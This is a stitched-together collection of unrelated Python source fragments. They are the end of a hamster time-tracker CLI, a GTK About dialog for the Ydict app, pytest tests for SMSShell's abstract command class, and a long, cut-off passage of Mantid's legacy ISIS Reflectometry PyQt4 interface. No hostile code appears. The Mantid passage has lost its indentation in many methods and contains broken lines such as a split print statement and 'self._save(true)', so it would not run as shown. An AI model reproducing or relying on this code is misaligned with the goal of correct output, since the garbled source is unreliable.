            run_args = [sys.argv[0]] + unknown_args
            logger.debug("run {}".format(run_args))
            status = app.run(run_args)
            logger.debug("app exited")
            sys.exit(status)
    elif hasattr(hamster_client, action):
        getattr(hamster_client, action)(*args.action_args)
    else:
        sys.exit(usage % {'prog': sys.argv[0]})
|
from gi.repository import Gtk
from .i18n import _
class AboutDialog(Gtk.AboutDialog):
    """Modal "About Ydict" dialog, pre-filled with the project metadata."""
    def __init__(self, parent):
        super(AboutDialog, self).__init__(title=_('About'), parent=parent)
        self.set_modal(True)
        # program identity
        self.set_program_name('Ydict')
        self.set_version('1.0')
        self.set_logo_icon_name('ydict')
        self.set_comments('')
        # credits and licensing
        self.set_authors(['Wiky L<wiiiky@outlook.com>'])
        self.set_artists(['Wiky L<wiiiky@outlook.com>'])
        self.set_copyright('Copyright (c) Wiky L 2015')
        self.set_license_type(Gtk.License.GPL_3_0)
        self.set_wrap_license(True)
        # project links
        self.set_website('https://github.com/wiiiky/ydict')
        self.set_website_label('GitHub')
|
from ._costs import *
|
import argparse
import logging
import pytest
import SMSShell
import SMSShell.commands
def test_abstract_init():
    """The command name defaults to the lowercased class name.

    (Local renamed from 'abs', which shadowed the builtin.)
    """
    command = SMSShell.commands.AbstractCommand(logging.getLogger(),
                                                object(),
                                                object(),
                                                object())
    assert command.name == 'abstractcommand'
def test_abstract_not_implemented():
    """Calling the abstract hooks directly must raise CommandBadImplemented.

    (Local renamed from 'abs', which shadowed the builtin.)
    """
    command = SMSShell.commands.AbstractCommand(logging.getLogger(),
                                                object(),
                                                object(),
                                                object())
    with pytest.raises(SMSShell.commands.CommandBadImplemented):
        command.description([])
    with pytest.raises(SMSShell.commands.CommandBadImplemented):
        command.usage([])
    with pytest.raises(SMSShell.commands.CommandBadImplemented):
        command.main([])
def test_abstract_bad_input_state_type():
    """inputStates() returning a non-list is reported as a bad implementation."""
    class BadCommand(SMSShell.commands.AbstractCommand):
        def inputStates(self):
            return dict()
    command = BadCommand(logging.getLogger(), object(), object(), object())
    with pytest.raises(SMSShell.commands.CommandBadImplemented):
        command._inputStates()
def test_abstract_bad_input_state_value():
    """inputStates() items must be valid states; bad values raise."""
    class BadCommand(SMSShell.commands.AbstractCommand):
        def inputStates(self):
            return ['d']
    command = BadCommand(logging.getLogger(), object(), object(), object())
    with pytest.raises(SMSShell.commands.CommandBadImplemented):
        command._inputStates()
def test_abstract_bad_arg_parser_type():
    """argsParser() must return a parser object; a plain string raises."""
    class BadCommand(SMSShell.commands.AbstractCommand):
        def argsParser(self):
            return 'a'
    command = BadCommand(logging.getLogger(), object(), object(), object())
    with pytest.raises(SMSShell.commands.CommandBadImplemented):
        command._argsParser()
def test_abstract_bad_arg_parser_init():
    """An argsParser() that raises is wrapped into CommandBadImplemented."""
    class BadCommand(SMSShell.commands.AbstractCommand):
        def argsParser(self):
            raise ValueError('no')
    command = BadCommand(logging.getLogger(), object(), object(), object())
    with pytest.raises(SMSShell.commands.CommandBadImplemented):
        command._argsParser()
|
from __future__ import (absolute_import, division, print_function)
try:
from mantidplot import *
except ImportError:
canMantidPlot = False #
import csv
import os
import re
from operator import itemgetter
import itertools
from PyQt4 import QtCore, QtGui
from mantid.simpleapi import *
from isis_reflectometry.quick import *
from isis_reflectometry.convert_to_wavelength import ConvertToWavelength
from isis_reflectometry import load_live_runs
from isis_reflectometry.combineMulti import *
import mantidqtpython
from mantid.api import Workspace, WorkspaceGroup, CatalogManager, AlgorithmManager
from mantid import UsageService
from ui.reflectometer.ui_refl_window import Ui_windowRefl
from ui.reflectometer.refl_save import Ui_SaveWindow
from ui.reflectometer.refl_choose_col import ReflChoose
from ui.reflectometer.refl_options import ReflOptions
# Qt4's QString.fromUtf8 does not exist in newer PyQt API levels; fall back
# to an identity function since strings are already unicode there.
try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    def _fromUtf8(s):
        # PyQt hands us native Python strings already
        return s
canMantidPlot = True
class ReflGui(QtGui.QMainWindow, Ui_windowRefl):
    """Main window of the legacy ISIS Reflectometry reduction interface."""
    current_instrument = None  # instrument name currently selected in the combo
    current_table = None  # currently loaded table (None until one is loaded) -- TODO confirm type
    current_polarisation_method = None  # PolarisationCorrection option in effect
    labelStatus = None  # status-bar QLabel, created in setup_layout()
    accMethod = None  # cached live-data accumulation method -- TODO confirm
    def __init__(self):
        """
        Initialise the interface: designer-built widgets, table column
        indices, and persisted QSettings (live data, algorithm use, ICAT
        download, workspace grouping, stitch scaling).
        """
        super(QtGui.QMainWindow, self).__init__()
        self.setupUi(self)
        self.loading = False
        self.clip = QtGui.QApplication.clipboard()
        self.shown_cols = {}
        self.mod_flag = False
        # fixed column layout of the runs table
        self.run_cols = [0, 5, 10]
        self.angle_cols = [1, 6, 11]
        self.scale_col = 16
        self.stitch_col = 17
        self.plot_col = 18
        self.__graphs = dict()
        self._last_trans = ""
        self.icat_file_map = None
        self.__instrumentRuns = None
        self.__icat_download = False
        self.__group_tof_workspaces = True
        # Q Settings group names / keys
        self.__generic_settings = "Mantid/ISISReflGui"
        self.__live_data_settings = "Mantid/ISISReflGui/LiveData"
        self.__search_settings = "Mantid/ISISReflGui/Search"
        self.__column_settings = "Mantid/ISISReflGui/Columns"
        self.__icat_download_key = "icat_download"
        self.__ads_use_key = "AlgUse"
        self.__alg_migration_key = "AlgUseReset"
        self.__live_data_frequency_key = "frequency"
        self.__live_data_method_key = "method"
        self.__group_tof_workspaces_key = "group_tof_workspaces"
        self.__stitch_right_key = "stitch_right"
        # Setup instrument with defaults assigned.
        self.instrument_list = ['INTER', 'SURF', 'CRISP', 'POLREF', 'OFFSPEC']
        self.polarisation_instruments = ['CRISP', 'POLREF']
        self.polarisation_options = {'None': PolarisationCorrection.NONE,
                                     '1-PNR': PolarisationCorrection.PNR,
                                     '2-PA': PolarisationCorrection.PA}
        # Set the live data settings, use default if none have been set before
        settings = QtCore.QSettings()
        settings.beginGroup(self.__live_data_settings)
        self.live_method = settings.value(self.__live_data_method_key, "", type=str)
        self.live_freq = settings.value(self.__live_data_frequency_key, 0, type=float)
        if not self.live_freq:
            logger.information(
                "No settings were found for Update frequency of loading live data, Loading default of 60 seconds")
            self.live_freq = float(60)
            settings.setValue(self.__live_data_frequency_key, self.live_freq)
        if not self.live_method:
            logger.information(
                "No settings were found for Accumulation Method of loading live data, Loading default of \"Add\"")
            self.live_method = "Add"
            settings.setValue(self.__live_data_method_key, self.live_method)
        settings.endGroup()
        settings.beginGroup(self.__generic_settings)
        self.__alg_migrate = settings.value(self.__alg_migration_key, True, type=bool)
        if self.__alg_migrate:
            self.__alg_use = True  # We will use the algorithms by default rather than the quick scripts
            self.__alg_migrate = False  # Never do this again. We only want to reset once.
        else:
            self.__alg_use = settings.value(self.__ads_use_key, True, type=bool)
        self.__icat_download = settings.value(self.__icat_download_key, False, type=bool)
        self.__group_tof_workspaces = settings.value(self.__group_tof_workspaces_key, True, type=bool)
        self.__scale_right = settings.value(self.__stitch_right_key, True, type=bool)
        # write the (possibly defaulted) values straight back so they persist
        settings.setValue(self.__ads_use_key, self.__alg_use)
        settings.setValue(self.__icat_download_key, self.__icat_download)
        settings.setValue(self.__group_tof_workspaces_key, self.__group_tof_workspaces)
        settings.setValue(self.__alg_migration_key, self.__alg_migrate)
        settings.setValue(self.__stitch_right_key, self.__scale_right)
        settings.endGroup()
        del settings
        # register startup
        UsageService.registerFeatureUsage("Interface", "ISIS Reflectomety", False)
def __del__(self):
"""
Save the contents of the table if the modified flag was still set
"""
if self.mod_flag:
self._save(true)
def _save_check(self):
"""
Show a custom message box asking if the user wants to save, or discard their changes or cancel back to the interface
"""
msgBox = QtGui.QMessageBox()
msgBox.setText("The table has been modified. Do you want to save your changes?")
accept_btn = QtGui.QPushButton('Save')
cancel_btn = QtGui.QPushButton('Cancel')
discard_btn = QtGui.QPushButton('Discard')
msgBox.addButton(accept_btn, QtGui.QMessageBox.AcceptRole)
msgBox.addButton(cancel_btn, QtGui.QMessageBox.RejectRole)
msgBox.addButton(discard_btn, QtGui.QMessageBox.NoRole)
msgBox.setIcon(QtGui.QMessageBox.Question)
msgBox.setDefaultButton(accept_btn)
msgBox.setEscapeButton(cancel_btn)
msgBox.exec_()
btn = msgBox.clickedButton()
saved = None
if btn.text() == accept_btn.text():
ret = QtGui.QMessageBox.AcceptRole
saved = self._save()
elif btn.text() == cancel_btn.text():
ret = QtGui.QMessageBox.RejectRole
else:
ret = QtGui.QMessageBox.NoRole
return ret, saved
def closeEvent(self, event):
"""
Close the window. but check if the user wants to save
"""
self.buttonProcess.setFocus()
if self.mod_flag:
event.ignore()
ret, saved = self._save_check()
if ret == QtGui.QMessageBox.AcceptRole:
if saved:
self.mod_flag = False
event.accept()
elif ret == QtGui.QMessageBox.RejectRole:
event.ignore()
elif ret == QtGui.QMessageBox.NoRole:
self.mod_flag = False
event.accept()
def _instrument_selected(self, instrument):
"""
Change the default instrument to the selected one
"""
config['default.instrument'] = self.instrument_list[instrument]
logger.notice("Instrument is now: " + str(config['default.instrument']))
self.textRB.clear()
self._populate_runs_list()
self.current_instrument = self.instrument_list[instrument]
self.comboPolarCorrect.setEnabled(
self.current_instrument in self.polarisation_instruments) # Enable as appropriate
self.comboPolarCorrect.setCurrentIndex(self.comboPolarCorrect.findText('None')) # Reset to None
def _table_modified(self, row, column):
"""
sets the modified flag when the table is altered
"""
# Sometimes users enter leading or trailing whitespace into a cell.
# Let's remove it for them automatically.
item = self.tableMain.item(row, column)
item.setData(0, str.strip(str(item.data(0))))
if not self.loading:
self.mod_flag = True
plotbutton = self.tableMain.cellWidget(row, self.plot_col).children()[1]
self.__reset_plot_button(plotbutton)
def _plot_row(self):
"""
handler for the plot buttons
"""
plotbutton = self.sender()
self._plot(plotbutton)
    def _show_slit_calculator(self):
        """Open the modal slit calculator dialog for the current instrument."""
        calc = mantidqtpython.MantidQt.MantidWidgets.SlitCalculator(self)
        calc.setCurrentInstrumentName(self.current_instrument)
        calc.processInstrumentHasBeenChanged()
        calc.exec_()
def _polar_corr_selected(self):
"""
Event handler for polarisation correction selection.
"""
if self.current_instrument in self.polarisation_instruments:
chosen_method = self.comboPolarCorrect.currentText()
self.current_polarisation_method = self.polarisation_options[chosen_method]
else:
logger.notice("Polarisation correction is not supported on " + str(self.current_instrument))
    def setup_layout(self):
        """
        Do further setup layout that couldn't be done in the designer:
        instrument combo, polarisation options, status bar, table and slots.
        Always returns True.
        """
        self.comboInstrument.addItems(self.instrument_list)
        current_instrument = config['default.instrument'].upper()
        if current_instrument in self.instrument_list:
            self.comboInstrument.setCurrentIndex(self.instrument_list.index(current_instrument))
        else:
            # unknown default instrument: fall back to INTER
            self.comboInstrument.setCurrentIndex(0)
            config['default.instrument'] = 'INTER'
        self.current_instrument = config['default.instrument'].upper()
        # Setup polarisation options with default assigned
        self.comboPolarCorrect.clear()
        self.comboPolarCorrect.addItems(list(self.polarisation_options.keys()))
        self.comboPolarCorrect.setCurrentIndex(self.comboPolarCorrect.findText('None'))
        self.current_polarisation_method = self.polarisation_options['None']
        self.comboPolarCorrect.setEnabled(self.current_instrument in self.polarisation_instruments)
        self.splitterList.setSizes([200, 800])
        self.labelStatus = QtGui.QLabel("Ready")
        self.statusMain.addWidget(self.labelStatus)
        self._initialise_table()
        self._populate_runs_list()
        self._connect_slots()
        return True
def _reset_table(self):
"""
Reset the plot buttons and stitch checkboxes back to thier defualt state
"""
# switches from current to true, to false to make sure stateChanged fires
self.checkTickAll.setCheckState(2)
self.checkTickAll.setCheckState(0)
for row in range(self.tableMain.rowCount()):
plotbutton = self.tableMain.cellWidget(row, self.plot_col).children()[1]
self.__reset_plot_button(plotbutton)
def __reset_plot_button(self, plotbutton):
"""
Reset the provided plot button to ti's default state: disabled and with no cache
"""
plotbutton.setDisabled(True)
plotbutton.setProperty('runno', None)
plotbutton.setProperty('overlapLow', None)
plotbutton.setProperty('overlapHigh', None)
plotbutton.setProperty('wksp', None)
    def _initialise_table(self):
        """
        Initialise the table. Clearing all data and adding the checkboxes
        and plot buttons, then applying the persisted column visibility.
        """
        # first check if the table has been changed before clearing it
        if self.mod_flag:
            ret, _saved = self._save_check()
            if ret == QtGui.QMessageBox.RejectRole:
                # user cancelled -- leave the table untouched
                return
        self.current_table = None
        settings = QtCore.QSettings()
        settings.beginGroup(self.__column_settings)
        for column in range(self.tableMain.columnCount()):
            for row in range(self.tableMain.rowCount()):
                if column in self.run_cols:
                    item = QtGui.QTableWidgetItem()
                    item.setText('')
                    item.setToolTip('Runs can be colon delimited to coadd them')
                    self.tableMain.setItem(row, column, item)
                elif column in self.angle_cols:
                    item = QtGui.QTableWidgetItem()
                    item.setText('')
                    item.setToolTip('Angles are in degrees')
                    self.tableMain.setItem(row, column, item)
                elif column == self.stitch_col:
                    # centred checkbox widget for the stitch column
                    check = QtGui.QCheckBox()
                    check.setCheckState(False)
                    check.setToolTip('If checked, the runs in this row will be stitched together')
                    item = QtGui.QWidget()
                    layout = QtGui.QHBoxLayout(item)
                    layout.addWidget(check)
                    layout.setAlignment(QtCore.Qt.AlignCenter)
                    layout.setSpacing(0)
                    layout.setContentsMargins(0, 0, 0, 0)
                    item.setLayout(layout)
                    item.setContentsMargins(0, 0, 0, 0)
                    self.tableMain.setCellWidget(row, self.stitch_col, item)
                elif column == self.plot_col:
                    # centred plot button, disabled until the row is processed
                    button = QtGui.QPushButton('Plot')
                    button.setProperty("row", row)
                    self.__reset_plot_button(button)
                    button.setToolTip('Plot the workspaces produced by processing this row.')
                    button.clicked.connect(self._plot_row)
                    item = QtGui.QWidget()
                    layout = QtGui.QHBoxLayout(item)
                    layout.addWidget(button)
                    layout.setAlignment(QtCore.Qt.AlignCenter)
                    layout.setSpacing(0)
                    layout.setContentsMargins(0, 0, 0, 0)
                    item.setLayout(layout)
                    item.setContentsMargins(0, 0, 0, 0)
                    self.tableMain.setCellWidget(row, self.plot_col, item)
                else:
                    item = QtGui.QTableWidgetItem()
                    item.setText('')
                    self.tableMain.setItem(row, column, item)
            # restore the persisted show/hide state for this column
            vis_state = settings.value(str(column), True, type=bool)
            self.shown_cols[column] = vis_state
            if vis_state:
                self.tableMain.showColumn(column)
            else:
                self.tableMain.hideColumn(column)
        settings.endGroup()
        del settings
        self.tableMain.resizeColumnsToContents()
        self.mod_flag = False
    def _connect_slots(self):
        """
        Connect the signals to the corresponding methods
        """
        # widget signals
        self.checkTickAll.stateChanged.connect(self._set_all_stitch)
        self.comboInstrument.activated[int].connect(self._instrument_selected)
        self.comboPolarCorrect.activated.connect(self._polar_corr_selected)
        self.textRB.returnPressed.connect(self._populate_runs_list)
        self.buttonAuto.clicked.connect(self._autofill)
        self.buttonSearch.clicked.connect(self._populate_runs_list)
        self.buttonClear.clicked.connect(self._initialise_table)
        self.buttonProcess.clicked.connect(self._process)
        self.buttonTransfer.clicked.connect(self._transfer)
        self.buttonColumns.clicked.connect(self._choose_columns)
        # file / table menu actions
        self.actionOpen_Table.triggered.connect(self._load_table)
        self.actionReload_from_Disk.triggered.connect(self._reload_table)
        self.actionSave.triggered.connect(self._save)
        self.actionSave_As.triggered.connect(self._save_as)
        self.actionSave_Workspaces.triggered.connect(self._save_workspaces)
        self.actionClose_Refl_Gui.triggered.connect(self.close)
        self.actionMantid_Help.triggered.connect(self._show_help)
        self.actionAutofill.triggered.connect(self._autofill)
        self.actionSearch_RB.triggered.connect(self._populate_runs_list)
        self.actionClear_Table.triggered.connect(self._initialise_table)
        self.actionProcess.triggered.connect(self._process)
        self.actionTransfer.triggered.connect(self._transfer)
        self.tableMain.cellChanged.connect(self._table_modified)
        # edit menu actions
        self.actionClear.triggered.connect(self._clear_cells)
        self.actionPaste.triggered.connect(self._paste_cells)
        self.actionCut.triggered.connect(self._cut_cells)
        self.actionCopy.triggered.connect(self._copy_cells)
        self.actionChoose_Columns.triggered.connect(self._choose_columns)
        self.actionRefl_Gui_Options.triggered.connect(self._options_dialog)
        self.actionSlit_Calculator.triggered.connect(self._show_slit_calculator)
def __valid_rb(self):
# Ensure that you cannot put zero in for an rb search
rbSearchValidator = QtGui.QIntValidator(self)
current_text = self.textRB.text()
rbSearchValidator.setBottom(1)
state = rbSearchValidator.validate(current_text, 0)[0]
if state == QtGui.QValidator.Acceptable:
return True
else:
self.textRB.clear()
if current_text:
logger.warning("RB search restricted to numbers > 0")
return False
    def _populate_runs_list(self):
        """
        Populate the list at the right with names of runs and workspaces
        from the archives, via an ICAT search on the entered RB number.
        Only raw files are displayed and mapped into icat_file_map.
        """
        # Clear existing
        self.listMain.clear()
        if self.__valid_rb():
            # Use ICAT for a journal search based on the RB number
            active_session_id = None
            if CatalogManager.numberActiveSessions() == 0:
                # Execute the CatalogLoginDialog
                login_alg = CatalogLoginDialog()
                session_object = login_alg.getProperty("KeepAlive").value
                active_session_id = session_object.getPropertyValue("Session")
            # Fetch out an existing session id
            # NOTE(review): this unconditionally overwrites the id obtained
            # from the login dialog above -- confirm that is intended.
            active_session_id = CatalogManager.getActiveSessions()[-1].getSessionId()
            # This might be another catalog session, but at present there is no way to tell.
            search_alg = AlgorithmManager.create('CatalogGetDataFiles')
            search_alg.initialize()
            search_alg.setChild(True)  # Keeps the results table out of the ADS
            search_alg.setProperty('InvestigationId', str(self.textRB.text()))
            search_alg.setProperty('Session', active_session_id)
            search_alg.setPropertyValue('OutputWorkspace', '_dummy')
            search_alg.execute()
            search_results = search_alg.getProperty('OutputWorkspace').value
            self.icat_file_map = {}
            self.statusMain.clearMessage()
            for row in search_results:
                file_name = row['Name']
                file_id = row['Id']
                description = row['Description']
                # NOTE(review): .group() raises if the file name has no
                # multi-digit run number -- assumed to always match here.
                run_number = re.search(r'[1-9]\d+', file_name).group()
                if bool(re.search('(raw)$', file_name, re.IGNORECASE)):  # Filter to only display and map raw files.
                    title = (run_number + ': ' + description).strip()
                    self.icat_file_map[title] = (file_id, run_number, file_name)
                    self.listMain.addItem(title)
            self.listMain.sortItems()
            del search_results
def _autofill(self):
"""
copy the contents of the selected cells to the row below as long as the row below contains a run number in the first cell
"""
# make sure all selected cells are in the same row
sum = 0
howMany = len(self.tableMain.selectedItems())
for cell in self.tableMain.selectedItems():
sum = sum + self.tableMain.row(cell)
if howMany:
selectedrow = self.tableMain.row(self.tableMain.selectedItems()[0])
if sum / howMany == selectedrow:
startrow = selectedrow + 1
filled = 0
for cell in self.tableMain.selectedItems():
row = startrow
txt = cell.text()
while self.tableMain.item(row, 0).text() != '':
item = QtGui.QTableWidgetItem()
item.setText(txt)
self.tableMain.setItem(row, self.tableMain.column(cell), item)
row = row + 1
filled = filled + 1
if not filled:
QtGui.QMessageBox.critical(self.tableMain,
'Cannot perform Autofill',
"No target cells to autofill. Rows to be filled should contain a run number in their "
"first cell, and start from directly below the selected line.")
else:
QtGui.QMessageBox.critical(self.tableMain, 'Cannot perform Autofill',
"Selected cells must all be in the same row.")
else:
QtGui.QMessageBox.critical(self.tableMain, 'Cannot perform Autofill', "There are no source cells selected.")
def _clear_cells(self):
"""
Clear the selected area of data
"""
cells = self.tableMain.selectedItems()
for cell in cells:
column = cell.column()
if column < self.stitch_col:
cell.setText('')
def _cut_cells(self):
"""
copy the selected cells then clear the area
"""
self._copy_cells()
self._clear_cells()
def _copy_cells(self):
"""
Copy the selected ranage of cells to the clipboard
"""
cells = self.tableMain.selectedItems()
if not cells:
print
'nothing to copy'
return
# first discover the size of the selection and initialise a list
mincol = cells[0].column()
if mincol > self.scale_col:
logger.error("Cannot copy, all cells out of range")
return
maxrow = -1
maxcol = -1
minrow = cells[0].row()
for cell in reversed(range(len(cells))):
col = cells[cell].column()
if col < self.stitch_col:
maxcol = col
maxrow = cells[cell].row()
break
colsize = maxcol - mincol + 1
rowsize = maxrow - minrow + 1
selection = [['' for x in range(colsize)] for y in range(rowsize)]
# now fill that list
for cell in cells:
row = cell.row()
col = cell.column()
if col < self.stitch_col:
selection[row - minrow][col - mincol] = str(cell.text())
tocopy = ''
for y in range(rowsize):
for x in range(colsize):
if x > 0:
tocopy += '\t'
tocopy += selection[y][x]
if y < (rowsize - 1):
tocopy += '\n'
self.clip.setText(str(tocopy))
    def _paste_cells(self):
        """
        Paste the contents of the clipboard to the table at the selected position

        Two modes: with a multi-cell selection the clipboard grid is mapped
        cell-for-cell onto the selection; with a single selected cell the whole
        clipboard grid is pasted starting there, clipped to the editable
        columns and the bottom of the table.
        """
        pastedtext = self.clip.text()
        if not pastedtext:
            logger.warning("Nothing to Paste")
            return
        selected = self.tableMain.selectedItems()
        if not selected:
            logger.warning("Cannot paste, no editable cells selected")
            return
        # clipboard format: rows separated by newlines, columns by tabs
        pasted = pastedtext.splitlines()
        pastedcells = []
        for row in pasted:
            pastedcells.append(row.split('\t'))
        pastedcols = len(pastedcells[0])
        pastedrows = len(pastedcells)
        if len(selected) > 1:
            # discover the size of the selection
            mincol = selected[0].column()
            if mincol > self.scale_col:
                logger.error("Cannot copy, all cells out of range")
                return
            minrow = selected[0].row()
            # now fill that list
            for cell in selected:
                row = cell.row()
                col = cell.column()
                # paste only into editable columns, and only where the
                # clipboard grid actually has data for this offset
                if col < self.stitch_col and (col - mincol) < pastedcols and (row - minrow) < pastedrows and len(
                        pastedcells[row - minrow]):
                    cell.setText(pastedcells[row - minrow][col - mincol])
        elif selected:
            # when only a single cell is selected, paste all the copied item up until the table limits
            cell = selected[0]
            currow = cell.row()
            homecol = cell.column()
            tablerows = self.tableMain.rowCount()
            for row in pastedcells:
                if len(row):
                    curcol = homecol
                    if currow < tablerows:
                        for col in row:
                            if curcol < self.stitch_col:
                                curcell = self.tableMain.item(currow, curcol)
                                curcell.setText(col)
                                curcol += 1
                            else:
                                # the row has hit the end of the editable cells
                                break
                        currow += 1
                    else:
                        # it's dropped off the bottom of the table
                        break
        else:
            logger.warning("Cannot paste, no editable cells selected")
    def _transfer(self):
        """
        Transfer run numbers to the table

        Selected list entries are parsed as "<run>:th=<theta>:...dq/q=<dqq>"
        (falling back to "<run>: <title>" with dummy theta/dq/q), grouped by
        title and then by angle: each angle occupies a 5-column slot
        (run, theta, transmission, qmin, qmax) and dq/q goes in column 15.
        """
        tup = ()
        for idx in self.listMain.selectedItems():
            split_title = re.split(":th=|th=|:|dq/q=", idx.text())
            if len(split_title) < 3:
                split_title = re.split(":", idx.text())
                if len(split_title) < 2:
                    logger.warning('cannot transfer ' + idx.text() + ' title is not in the right form ')
                    continue
                else:
                    theta = 0
                    split_title.append(theta)  # Append a dummy theta value.
            if len(split_title) < 4:
                dqq = 0
                split_title.append(dqq)  # Append a dummy dq/q value.
            tup = tup + (split_title,)  # Tuple of lists containing (run number, title, theta, dq/q)
        tupsort = sorted(tup, key=itemgetter(1, 2))  # now sorted by title then theta
        row = 0
        for _key, group in itertools.groupby(tupsort, lambda x: x[1]):  # now group by title
            col = 0
            dqq = 0  # only one value of dqq per row
            run_angle_pairs_of_title = list()  # for storing run_angle pairs all with the same title
            for object in group:  # loop over all with equal title
                run_no = object[0]
                dqq = object[-1]
                angle = object[-2]
                run_angle_pairs_of_title.append((run_no, angle))
            # runs sharing title AND angle are summed with '+' into one slot
            for angle_key, group in itertools.groupby(run_angle_pairs_of_title, lambda x: x[1]):
                runnumbers = "+".join(["%s" % pair[0] for pair in group])
                # set the runnumber
                item = QtGui.QTableWidgetItem()
                item.setText(str(runnumbers))
                self.tableMain.setItem(row, col, item)
                # Set the angle
                item = QtGui.QTableWidgetItem()
                item.setText(str(angle_key))
                self.tableMain.setItem(row, col + 1, item)
                # Set the transmission
                item = QtGui.QTableWidgetItem()
                item.setText(self.textRuns.text())
                self.tableMain.setItem(row, col + 2, item)
                col = col + 5
                if col >= 11:
                    col = 0
            # set dq/q
            item = QtGui.QTableWidgetItem()
            item.setText(str(dqq))
            self.tableMain.setItem(row, 15, item)
            row = row + 1
            if self.__icat_download:
                # If ICAT is being used for download, then files must be downloaded at the same time as they are transferred
                # NOTE(review): 'idx' here is the leftover loop variable from the
                # selection loop above (i.e. the last selected item) -- confirm
                # this downloads the intended file for every transferred row.
                contents = str(idx.text()).strip()
                file_id, _runnumber, file_name = self.icat_file_map[contents]
                active_session_id = CatalogManager.getActiveSessions()[-1].getSessionId()
                # This might be another catalog session, but at present there is no way to tell.
                save_location = config['defaultsave.directory']
                CatalogDownloadDataFiles(file_id, FileNames=file_name, DownloadPath=save_location,
                                         Session=active_session_id)
                current_search_dirs = config.getDataSearchDirs()
                if save_location not in current_search_dirs:
                    config.appendDataSearchDir(save_location)
def _set_all_stitch(self, state):
"""
Set the checkboxes in the Stitch? column to the same
"""
for row in range(self.tableMain.rowCount()):
self.tableMain.cellWidget(row, self.stitch_col).children()[1].setCheckState(state)
def __checked_row_stiched(self, row):
return self.tableMain.cellWidget(row, self.stitch_col).children()[1].checkState() > 0
    def _process(self):
        """
        Process has been pressed, check what has been selected then pass the selection (or whole table) to quick

        For each selected row (or all rows after confirmation): gather up to
        three run entries (each angle is a 5-column slot: run, theta, trans,
        qmin, qmax), determine dq/q (column 15) from the table or from the
        run's Theta log, reduce each run via _do_run, optionally stitch the
        results, and arm the row's plot button with the cached results.
        """
        # --------- If "Process" button pressed, convert raw files to IvsLam and IvsQ and combine if checkbox ticked -------------
        _overallQMin = float("inf")
        _overallQMax = float("-inf")
        try:
            willProcess = True
            rows = self.tableMain.selectionModel().selectedRows()
            rowIndexes = []
            for idx in rows:
                rowIndexes.append(idx.row())
            if not len(rowIndexes):
                # nothing selected: offer to process the whole table
                reply = QtGui.QMessageBox.question(self.tableMain, 'Process all rows?',
                                                   "This will process all rows in the table. Continue?",
                                                   QtGui.QMessageBox.Yes, QtGui.QMessageBox.No)
                if reply == QtGui.QMessageBox.No:
                    logger.notice("Cancelled!")
                    willProcess = False
                else:
                    rowIndexes = range(self.tableMain.rowCount())
            if willProcess:
                for row in rowIndexes:  # range(self.tableMain.rowCount()):
                    runno = []
                    wksp = []
                    overlapLow = []
                    overlapHigh = []
                    if self.tableMain.item(row, 0).text() != '':
                        self.statusMain.showMessage("Processing row: " + str(row + 1))
                        logger.debug("Processing row: " + str(row + 1))
                        for i in range(3):
                            run_entry = str(self.tableMain.item(row, i * 5).text())
                            if run_entry != '':
                                runno.append(run_entry)
                            ovLow = str(self.tableMain.item(row, (i * 5) + 3).text())
                            if ovLow != '':
                                overlapLow.append(float(ovLow))
                            ovHigh = str(self.tableMain.item(row, (i * 5) + 4).text())
                            if ovHigh != '':
                                overlapHigh.append(float(ovHigh))
                        # Determine resolution
                        if self.tableMain.item(row, 15).text() == '':
                            loadedRun = None
                            if load_live_runs.is_live_run(runno[0]):
                                loadedRun = load_live_runs.get_live_data(config['default.instrument'],
                                                                         frequency=self.live_freq,
                                                                         accumulation=self.live_method)
                            else:
                                Load(Filename=runno[0], OutputWorkspace="_run")
                                loadedRun = mtd["_run"]
                            theta_in_str = str(self.tableMain.item(row, 1).text())
                            try:
                                theta_in = None
                                if len(theta_in_str) > 0:
                                    theta_in = float(theta_in_str)
                                # Make sure we only ever run calculate resolution on a non-group workspace.
                                # If we're given a group workspace, we can just run it on the first member of the group instead
                                thetaRun = loadedRun
                                if isinstance(thetaRun, WorkspaceGroup):
                                    thetaRun = thetaRun[0]
                                if not theta_in:
                                    theta_in = getLogValue(thetaRun, "Theta")
                                dqq = NRCalculateSlitResolution(Workspace=thetaRun, TwoTheta=2*theta_in)
                                # Put the calculated resolution into the table
                                resItem = QtGui.QTableWidgetItem()
                                resItem.setText(str(dqq))
                                self.tableMain.setItem(row, 15, resItem)
                                # Update the value for theta_in in the table
                                ttItem = QtGui.QTableWidgetItem()
                                ttItem.setText(str(theta_in))
                                self.tableMain.setItem(row, 1, ttItem)
                                logger.notice("Calculated resolution: " + str(dqq))
                            except:
                                self.statusMain.clearMessage()
                                logger.error(
                                    "Failed to calculate dq/q because we could not find theta in the workspace's sample log. "
                                    "Try entering theta or dq/q manually.")
                                return
                        else:
                            dqq = float(self.tableMain.item(row, 15).text())
                        # Check secondary and tertiary theta_in columns, if they're
                        # blank and their corresponding run columns are set, fill them.
                        for run_col in [5, 10]:
                            tht_col = run_col + 1
                            run_val = str(self.tableMain.item(row, run_col).text())
                            tht_val = str(self.tableMain.item(row, tht_col).text())
                            if run_val and not tht_val:
                                Load(Filename=run_val, OutputWorkspace="_run")
                                loadedRun = mtd["_run"]
                                tht_val = getLogValue(loadedRun, "Theta")
                                if tht_val:
                                    self.tableMain.item(row, tht_col).setText(str(tht_val))
                        # Populate runlist
                        first_wq = None
                        for i in range(0, len(runno)):
                            theta, qmin, qmax, _wlam, wqBinnedAndScaled, _wqUnBinnedAndUnScaled = \
                                self._do_run(runno[i], row, i)
                            if not first_wq:
                                first_wq = wqBinnedAndScaled  # Cache the first Q workspace
                            theta = round(theta, 3)
                            qmin = round(qmin, 3)
                            qmax = round(qmax, 3)
                            wksp.append(wqBinnedAndScaled.name())
                            # write back any theta/qmin/qmax the reduction produced
                            if self.tableMain.item(row, i * 5 + 1).text() == '':
                                item = QtGui.QTableWidgetItem()
                                item.setText(str(theta))
                                self.tableMain.setItem(row, i * 5 + 1, item)
                            if self.tableMain.item(row, i * 5 + 3).text() == '':
                                item = QtGui.QTableWidgetItem()
                                item.setText(str(qmin))
                                self.tableMain.setItem(row, i * 5 + 3, item)
                                overlapLow.append(qmin)
                            if self.tableMain.item(row, i * 5 + 4).text() == '':
                                item = QtGui.QTableWidgetItem()
                                item.setText(str(qmax))
                                self.tableMain.setItem(row, i * 5 + 4, item)
                                overlapHigh.append(qmax)
                            if wksp[i].find(',') > 0 or wksp[i].find(':') > 0:
                                wksp[i] = first_wq.name()
                        if self.__checked_row_stiched(row):
                            if len(runno) == 1:
                                logger.notice("Nothing to combine for processing row : " + str(row))
                            else:
